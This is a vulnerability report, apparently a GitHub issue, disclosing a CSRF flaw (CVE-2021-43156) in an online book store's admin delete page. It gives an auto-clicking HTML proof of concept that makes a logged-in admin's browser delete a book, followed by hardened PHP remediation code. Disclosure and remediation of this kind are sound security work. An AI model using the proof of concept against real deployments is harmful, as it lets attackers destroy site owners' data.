CVE-2021-43156: CSRF vulnerability in admin_delete.php allows a remote attacker to delete any book · Issue #19 · projectworldsofficial/online-book-store-project-in-php
In ProjectWorlds Online Book Store PHP 1.0 a CSRF vulnerability in admin_delete.php allows a remote attacker to delete any book.
Author: KhanhCM (@khanhchauminh)
Version: 1.0

Details
The GET request that deletes the book with ISBN 12345 looks like this:
http://127.0.0.1:8888/admin_delete.php?bookisbn=12345
The only thing that authorizes the request is the admin's session cookie, which the browser attaches automatically. Any request carrying a bookisbn value, issued from a browser where the admin is logged in, deletes the book with that ISBN; the page does not check where the request came from and carries no secret that an attacker could not predict.
A remote attacker can embed the request into an innocent-looking hyperlink:
<a href="http://127.0.0.1:8888/admin_delete.php?bookisbn=12345">View</a>
Steps to reproduce
- First, create a malicious HTML page and host it on a website the attacker controls.
PoC:
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<p>CSRF PoC</p>
<a id='link' href="http://127.0.0.1:8888/admin_delete.php?bookisbn=12345">View</a>
<script>
document.getElementById('link').click();
</script>
</body>
</html>
- Entice the logged-in admin to visit the malicious page. When the admin's browser loads it, the script clicks the link automatically, the browser sends the GET request together with the admin's session cookie, and the book with ISBN 12345 is deleted. The PoC uses a top-level link navigation rather than a background fetch because cookies marked SameSite=Lax are still sent on such navigations, so the attack works even with the browser default cookie policy.
Response in Burp Suite (screenshot)
Source code review: admin_delete.php (screenshot)
Remediation
Implement an anti-CSRF token: generate an unpredictable per-session token, embed it in the admin's delete form, and reject any request whose token does not match the one stored server-side. Accept the delete only over POST so that a plain hyperlink or image tag cannot trigger it, and set the session cookie with the SameSite attribute as defence in depth.
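The following is an added example of that remediation, not the project's own code and not part of the original report. It assumes the admin login stores a flag in $_SESSION['admin'], that books live in a table named books keyed by a column isbn, and that $db is a PDO connection created elsewhere; those names are assumptions for illustration.

```php
<?php
// Added example: hardened admin_delete.php with a synchronizer (anti-CSRF) token.
// Assumed names: $_SESSION['admin'] (set at login), table `books`, column `isbn`,
// and $db, a PDO connection opened elsewhere in the application.
session_start();

// Return the session's anti-CSRF token, creating an unpredictable one on first use.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 256 bits of CSPRNG output
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session token in constant time.
function csrf_valid($submitted): bool {
    if (empty($_SESSION['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Authorization: only a logged-in admin may reach the delete action.
if (empty($_SESSION['admin'])) {
    http_response_code(403);
    exit('admin login required');
}

// State-changing action: POST only, so a plain <a href> or <img src> cannot trigger it.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    header('Allow: POST');
    exit('use POST');
}

// Reject any request that does not carry the token issued to this admin's session.
if (!csrf_valid($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('invalid CSRF token');
}

// Parameterized delete; the ISBN comes from the POST body, never from the query string.
$isbn = $_POST['bookisbn'] ?? '';
$stmt = $db->prepare('DELETE FROM books WHERE isbn = ?');
$stmt->execute([$isbn]);

header('Location: admin_book.php'); // assumed name of the admin book list page
exit;

// The delete control on the admin book list page then becomes a form that carries
// the token (rendered by the same PHP session, so csrf_token() returns the same value):
//
// <form method="post" action="admin_delete.php">
//   <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">
//   <input type="hidden" name="bookisbn" value="12345">
//   <button type="submit">Delete</button>
// </form>
```

With this in place the PoC above fails twice over: the automatic link click is a GET and is refused with 405, and even a forged cross-site POST cannot supply the csrf_token value, because the attacker's page cannot read the admin's session or the form that embeds the token.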